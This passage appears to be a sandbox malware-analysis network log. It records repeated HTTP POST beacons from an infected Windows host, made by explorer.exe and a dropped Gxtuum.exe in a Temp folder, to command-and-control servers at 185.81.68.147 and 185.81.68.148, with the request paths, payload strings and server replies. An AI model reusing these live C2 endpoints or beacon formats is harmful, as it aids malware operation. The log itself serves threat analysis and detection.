r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:38:18.256582022 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:17 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	49929	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:18.626338005 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:18.746229887 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:20.084045887 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:19 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	49934	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:19.811393976 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:38:21.136235952 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:20 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	49935	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:20.065779924 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:38:21.429039955 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:20 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	49936	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:20.313132048 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:20.433044910 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:21.905390024 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:20 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	49941	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:22.140980959 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:22.261300087 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:23.590082884 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:22 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	49943	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:22.834162951 CET	312	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:38:24.205987930 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:23 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.5	49944	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:23.157795906 CET	309	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:38:24.507220030 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:23 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	49945	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:23.828351021 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:23.948244095 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:25.290349960 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:24 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	49951	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:25.516387939 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:25.636353016 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:27.123725891 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:26 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	49952	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:26.219468117 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:38:27.336642981 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:26 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	49953	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:26.666832924 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:38:27.991276979 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:27 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	49959	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:27.359734058 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:27.479851961 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:29.000904083 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:28 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.5	49960	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:29.235184908 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:29.355673075 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:30.907896042 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:29 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	49962	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:29.484174967 CET	312	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:38:30.819617987 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:30 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.5	49967	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:29.711277008 CET	309	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:38:31.038338900 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:30 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.5	49968	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:31.140907049 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:31.260750055 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:32.824966908 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:31 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.5	49974	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:32.630582094 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:38:33.944586992 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:33 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.5	49975	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:32.809621096 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:38:34.230974913 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:33 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.5	49976	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:33.047070026 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:33.166940928 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:34.673382998 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:33 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.5	49982	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:34.906435966 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:35.026442051 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:36.342917919 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:35 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.5	49983	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:35.622526884 CET	312	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:38:36.964060068 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:36 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.5	49984	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:35.891947985 CET	309	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:38:37.241774082 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:36 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.5	49985	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:36.585829020 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:36.705821037 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:38.031996012 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:37 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.5	49991	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:38.268978119 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:38.388994932 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:39.891872883 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:38 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.5	49992	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:38.763472080 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:38:40.100713015 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:39 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.5	49993	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:39.070377111 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:38:40.413897038 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:39 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.5	49999	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
